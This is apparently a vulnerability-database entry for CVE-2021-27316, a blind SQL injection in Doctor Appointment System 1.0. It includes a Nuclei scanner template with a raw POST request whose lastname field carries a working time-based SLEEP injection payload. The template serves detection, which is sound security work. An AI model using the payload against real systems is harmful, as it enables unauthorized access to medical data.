Lucene search
K

Doctor Appointment System 1.0 - SQL Injection

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 20 Views

Doctor Appointment System 1.0 - SQL Injection allows unauthenticated attacker to insert malicious SQL queries via lastname parameter, leading to unauthorized access, data leakage, or data manipulation. Upgrade to latest version to mitigate this vulnerability

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
Doctor Appointment System 1.0 SQL Injection Vulnerability
3 Mar 202100:00
zdt
CNNVD
Sourcecodesterk Doctor Appointment System SQL注入漏洞
3 Mar 202100:00
cnnvd
Check Point Advisories
Doctor Appointment System SQL Injection (CVE-2021-27314; CVE-2021-27315; CVE-2021-27316)
16 Mar 202100:00
checkpoint_advisories
CVE
CVE-2021-27316
24 Mar 202113:44
cve
Cvelist
CVE-2021-27316
24 Mar 202113:44
cvelist
NVD
CVE-2021-27316
24 Mar 202114:15
nvd
OSV
CVE-2021-27316
24 Mar 202114:15
osv
Packet Storm
Doctor Appointment System 1.0 SQL Injection
3 Mar 202100:00
packetstorm
Prion
Sql injection
24 Mar 202114:15
prion
RedhatCVE
CVE-2021-27316
22 May 202518:27
redhatcve
Rows per page
id: CVE-2021-27316

info:
  name: Doctor Appointment System 1.0 - SQL Injection
  author: theamanrawat
  severity: high
  description: |
    Blind SQL injection in contactus.php in doctor appointment system 1.0 allows an unauthenticated attacker to insert malicious SQL queries via lastname parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
    - http://packetstormsecurity.com/files/161642/Doctor-Appointment-System-1.0-Blind-SQL-Injection.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-27316
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-27316
    cwe-id: CWE-89
    epss-score: 0.07826
    epss-percentile: 0.93959
    cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: doctor_appointment_system_project
    product: doctor_appointment_system
  tags: time-based-sqli,cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project,vuln

http:
  - raw:
      - |
        @timeout: 10s
        POST /contactus.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        firstname={{randstr}}&lastname=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&email={{randstr}}%40test.com&comment={{randstr}}&submit=Send+Us

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 500'
          - 'contains(body, "Medical Management System")'
        condition: and
# digest: 4a0a00473045022100849b4691e9d5cc7428843282058f11745610bca9caa7c422c36c53d7c5a9888102202d047940055dad2fd616d90a71382897dec1a477e50e8f21dc411d77ac28f7cd:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 25
CVSS 3.17.5
EPSS0.07826
20